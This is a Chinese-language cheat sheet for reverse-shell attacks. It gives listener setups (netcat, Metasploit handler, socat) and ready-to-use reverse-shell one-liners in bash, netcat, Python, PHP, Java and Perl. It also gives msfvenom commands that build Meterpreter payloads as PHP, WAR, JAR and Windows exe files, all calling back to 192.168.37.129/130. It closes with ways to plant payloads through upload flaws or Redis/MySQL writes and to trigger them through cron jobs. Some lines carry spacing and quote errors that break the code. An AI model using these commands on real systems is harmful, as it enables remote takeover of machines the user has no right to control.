反弹连接适应情况
- 没有安装HTTP Server或找不到网站目录
- 内网,私有IP
- IP动态变化
- 6379端口不允许入方向
- 一句话木马被删除
常见端口监听方式
- netcat:nc -lvp 7777
- msf:
msfconsole
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set lhost 192.168.37.130
set lport 7777
run - socat:socat TCP-LISTEN:7777 - (kali系统)
建立反弹连接方式
- Linux bash:
bash -i >& /dev/tcp/192.168.37.129/7777 0>&1 - netcat:
nc -e /bin/bash 192.168.37.129 7777 - Python:
python - c “import os,socket,subprocess;
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((‘192.168.37.129’,7777));os.dup2(s.fileno(),0);os.du p2(s.fileno(),1);
os.dup2(s.fileno(),2);p=subprocess.call([’/bin/bash’,’- i’]);” - PHP:
1)php -r ‘exec("/bin/bash -i >& /dev/tcp/192.168.37.129 7777");’
2)php -r '$sock=fsockopen(“192.168.37.129”,7777);exec("/bin/bash -i <&3 >&3 2>&3");’ - Java:
r = Runtime.getRuntime() p = r.exec(["/bin/bash","-c",“exec 5<>/dev/tcp/192.168.37.129/7777;cat <&5 | while read line; do $line 2>&5 >&5; done”] as String[]) p.waitFor() - perl:
perl - e ‘use Socket;$i=“192.168.37.129”;$p=7777;socket(S,PF_INET,SOCK_STREAM,ge tprotobyname(“tcp”));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(S TDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh - i");};’ - msf-PHP:
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.37.130 lport=7777 -o shell.php - msf-Java:
1)msfvenom -p java/meterpreter/reverse_tcp lhost=192.168.37.130 lport=7777 -f war -o shell.war
2)msfvenom -p java/meterpreter/reverse_tcp lhost=192.168.37.130 lport=7777 -f jar -o shell.jar - msf-exe:
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.37.130 lport=7777 -i 5 -f exe -o test.exe
msf反弹连接配合msf监听模块使用
反弹连接流程
监听端口->执行命令,或上传payload访问,建立连接
如何上传文件:
- 文件上传漏洞
- 写入文件:MSQL、Redis、CMS
- 文件编辑命令:tee、.py
如何执行:访问或定时任务自动触发